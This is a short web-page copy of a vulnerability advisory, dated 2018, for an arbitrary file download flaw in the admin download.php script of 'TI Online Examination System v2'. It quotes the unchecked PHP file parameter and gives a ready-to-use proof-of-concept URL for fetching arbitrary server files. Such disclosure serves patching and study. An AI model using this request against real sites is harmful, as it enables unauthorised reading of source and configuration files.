facebook facebook twitter rss

TI Online Examination System v2 - Arbitrary File Download

Author: Rednofozi , Published: 01-09-2018
############################################
# Title : TI Online Examination System v2 - Arbitrary File Download
# Author :Rednofozi
# category : webapps
# Tested On : Kali Linux
# my team:https://anonysec.org
# me : Rednofozi@yahoo.com
# Vendor HomePage :https://codecanyon.net/item/ti-online-examination-system-v2/11248904
# Google Dork: inurl:N/A
# Description : The "Export" operation in the admin panel is vulnerable.
The attacker can download and read all files known by the name via
"download.php"
############################################

# search google Dork : N/A

####################Proof of Concept #############

Demo : server/admin/
# Vuln file : /admin/download.php

115. $data_action = $_REQUEST['action'];
116. if($data_action == 'downloadfile')
117. {
118. $file = $_REQUEST['file'];
119. $name = $file;
120. $result = output_file($file, $name);

# PoC :
http://server/admin/download.php?action=downloadfile&file=[filename]
you can write the known file name instead of [filename]. For Example:
'download.php' or 'index.php'

######################


# Discovered by : Rednofozi


#--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow

Like us on Facebook :